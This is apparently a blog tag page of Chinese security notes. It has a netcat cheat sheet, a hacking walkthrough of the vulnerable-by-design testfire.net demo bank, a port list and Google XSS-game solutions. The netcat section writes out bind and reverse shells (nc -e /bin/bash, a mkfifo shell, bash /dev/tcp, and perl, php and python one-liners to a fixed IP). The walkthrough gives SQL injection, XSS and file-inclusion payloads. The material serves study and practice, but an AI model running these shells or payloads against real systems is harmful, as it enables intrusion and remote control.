Tag:hacker

Tag (hacker)'s result:

NC用法整理

-p 指定端口,-s 指定地址   1.端口扫描(不太好用) 扫描端口段 nc -v -z ip port-port 加上-u则扫UDP端口 可以查看banner信息。   2.正/反向域名解析 -n接受IP,不解析域名,-v可以正反向域名解析   3.聊天室 nc -l 192.168.1.2 -p 8999 nc 192.168.1.2 8999 就可以发消息给.1.2主机了   4.文件传输 A:nc -l 192.168.43.237 -p 8999 < test.txt B: nc 192.168.43.237 8999 > test2.txt B 就可以接收到A的test.txt了   5.传输目录(打包压缩) A:tar -cvf – dir_name| bzip2 -z | nc -l 192.168.1.2 -p 8999 B:nc -n 192.168.1.2 8999 | bzip2 -d |tar -xvf – B就可以接受到A的压缩文件了   6.加密数据 A:nc -l 192.168.1.2 -p 8999 | mcrypt –flush –bare -F -q -d -m ecb > file.txt B:mcrypt –flush –bare -F -q -m ecb < file.txt | nc -l 192.168.1.2 -p 8999   7.克隆一个设备 A:dd if=/dev/sda | nc -l 8999 B:nc -n ip 8999 | dd of=/dev/sda   8.重定向程序(都懂的) 正向: A:nc -l 192.168.1.2 -p 8999 -e /bin/bash B:nc 192.168.1.2 -p 8999 反向: A:nc -l 192.168.1.2 -p 8999 B:nc 192.168.1.2 8999 -e /bin/bash   假如netcat 不支持-c 或者 -e 参数(openbsd netcat),我们仍然能够创建远程shell A: $mkfifo /tmp/tmp_fifo $cat /tmp/tmp_fifo | /bin/sh -i 2>&1 | nc -l 8999 > /tmp/tmp_fifo 这里我们创建了一个fifo文件,然后使用管道命令把这个fifo文件内容定向到shell 2>&1中。是用来重定向标准错误输出和标准输出,然后管道到netcat 运行的端口1567上。至此,我们已经把netcat的输出重定向到fifo文件中。 说明: 从网络收到的输入写到fifo文件中 cat 命令读取fifo文件并且其内容发送给sh命令 sh命令进程受到输入并把它写回到netcat。 netcat 通过网络发送输出到client 至于为什么会成功是因为管道使命令平行执行,fifo文件用来替代正常文件,因为fifo使读取等待而如果是一个普通文件,cat命令会尽快结束并开始读取空文件。 在客户端仅仅简单连接到服务器 B: $nc -n 192.168.1.2 8999 你会得到一个shell提示符在客户端 (其他反向shell: bash: bash -i>&/dev/tcp/192.168.100.113/4444 0>&1 perl:  perl -e’use Socket; $ i =“192.168.100.113”; $ p = 4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”)); if(connect(S,sockaddr_in($ p,inet_aton (STDOUT,“>&S”);open(STDOUT,“>&S”);open(STDERR,“>&S”); exec(“/ bin / sh -i”);} ;” php:  php -r’$ sock = fsockopen(“192.168.100.113”,4444); exec(“/ bin / sh -i <&3>&3 2>&3”); python:  python -c’import socket,subprocess,os; s = socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect((“192.168.100.113”,4444)); os.dup2(s.fileno() ,0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); P = subprocess.call([“/ bin / sh”,” –        i”]);” )   9.蜜罐 nc -L 192.168.1.2 -p 80 > c:\log.txt 使用’-L’可以不停地监听某一个端口,直到ctrl+c为止,同时把结果输出到’c:\log.txt’中,如果把‘>’ 改为‘>>’即可以追加日志。 //我的版本nc没有-L参数……   10.两台服务器文件校验 // 192.168.1.2 # find /etc/rc.d/ -type f|xargs md5sum|nc -l 8999   // 192.168.1.3 # nc 192.168.1.2 8999|md5sum -c -|grep -v OK 这样可比较的东西就多了,例如下面命令检查机器上的sid位: find / -xdev -type f -user root \( -perm -4000 -o -perm -2000 \)   nc神器,真的小巧又强大!   参考链接: http://blog.csdn.net/gavinr/article/details/7277507 http://www.oschina.net/translate/linux-netcat-command http://www.ddvip.com/detail/1000230090.html https://bbs.ichunqiu.com/thread-23024-1-1.html

How to hack www.testfire.net

AltoroMutual is an vulnerable-by-design web application created by WatchFire,now let us hack it. www.testfire.net: 1.Weak password : www.testfire.net/bank/login.aspx admin admin   2.SQL injection(word type) www.testfire.net/bank/login.aspx username: ‘ or ‘1’=’1 password:’ or ‘1’=’1   3.Reflection xss www.testfire.net/search.aspx?txtSearch=<script>alert(%2Fxss%2F)<%2Fscript> <script>alert(/xss/)</script>   4.File inclusion: www.testfire.net/default.aspx?content=1xxxxx.txt that cause absolute path leak:‘C:\downloads\AltoroMutual_v6\website\static\1xxxxx.txt’.    5.Directory traverse www.testfire.net/bank/   6.Source code leak Using file inclusion and directory traverse,then use %00 to bypass txt and htm. http://www.testfire.net/default.aspx?content=../bank/login.aspx.cs%00.txt using System;using System.Data;using System.Data.SqlClient;using System.Data.OleDb;using System.Text.RegularExpressions;using System.Web;using System.Web.UI;using System.Web.UI.WebControls;using System.Web.UI.HtmlControls;using System.Configuration;namespace Altoro{ public partial class Authentication : Page { protected void Page_Load(object sender, System.EventArgs e) { // Put user code to initialize the page here Response.Cache.SetCacheability(HttpCacheability.NoCache); HtmlMeta meta = new HtmlMeta(); HtmlHead head = (HtmlHead)Page.Header; meta.Name = “keywords”; meta.Content = “Altoro Mutual Login, login, authenticate”; head.Controls.Add(meta); if(Request.Params[“passw”] != null) { String uname = Request.Params[“uid”]; String passwd = Request.Params[“passw”]; String msg = ValidateUser(uname, passwd); if (msg == “Success”) { Response.Redirect(“main.aspx”); } else { message.Text = “Login Failed: ” + msg; } } } protected string ValidateUser(String uName, String pWord) { //Set default status to Success string status =……

一些端口汇总

网上看到的,备用。 TCP端口 7 = 回显 9 = 丢弃 11 = 在线用户 13 = 时间服务 15 = 网络状态 17 = 每日引用 18 = 消息发送 19 = 字符发生器 20 = ftp数据 21 = 文件传输 22 = SSH端口 23 = 远程终端 25 = 发送邮件 31 = Masters Paradise木马 37 = 时间 39 = 资源定位协议 41 = DeepThroat木马 42 = WINS 主机名服务 43 = WhoIs服务 58 = DMSetup木马 59 = 个人文件服务 63 = WHOIS端口 69 = TFTP服务 70 = 信息检索 79 = 查询在线用户 80 = WEB网页 88 = Kerberros5认证 101 = 主机名 102 = ISO 107 = 远程登录终端 109 = pop2邮件 110 = pop3邮件 111 = SUN远程控制 113 = 身份验证 117 = UUPC 119 = nntp新闻组 121 = JammerKillah木马 135 = 本地服务 138 = 隐形大盗 139 = 文件共享 143 = IMAP4邮件 146 = FC-Infector木马 158 = 邮件服务 170 = 打印服务 179 = BGP 194 = IRC PORT 213 = TCP OVER IPX 220 = IMAP3邮件 389 = 目录服务 406 = IMSP PORT 411 = DC++ 421 = TCP Wrappers 443 = 安全WEB访问 445 =……

Google xss-game solution(level 1-6)

[1/6]  Level 1: Hello, world of XSS bug: message = “Sorry, no results were found for <b>” + query + “</b>.” message += ” <a href=’?’>Try again</a>.” # Display the results page self.render_string(page_header + message + page_footer) exp: <script>alert(/xss/)</script> [2/6]  Level 2: Persistence is key bug: html += “<blockquote>” + posts[i].message + “</blockquote”; …… var message = document.getElementById(‘post-content’).value; exp:<img src=1 onerror=”alert(/xss/)”> [3/6]  Level 3: That sinking feeling… bug: html += “<img src=’/static/level3/cloud” + num + “.jpg’ />”; exp:https://xss-game.appspot.com/level3/frame#2xss’ onerror=”alert(/xss/)” [4/6]  Level 4: Context matters bug: <img src=”/static/loading.gif” onload=”startTimer(‘{{ timer }}’);” /> exp:3′);alert(‘xss [5/6]  Level 5: Breaking protocol bug: https://xss-game.appspot.com/level5/frame/signup?next=confirm <a href=”{{ next }}”>Next >></a> we can change the ‘next’ parameter. exp:https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert(/xss/) then click go,and input email or everything [6/6]  Level 6: Follow the 🐇 bug: if (url.match(/^https?:\/\//)) {—————–bypass:t-T scriptEl.src = url; // Show log messages scriptEl.onload = function() { setInnerText(document.getElementById(“log”), “Loaded gadget from ” + url); …… // Take the value after # and use it as the gadget filename. function getGadgetName() { return window.location.hash.substr(1) || “/static/gadget.js”; } includeGadget(getGadgetName()); we……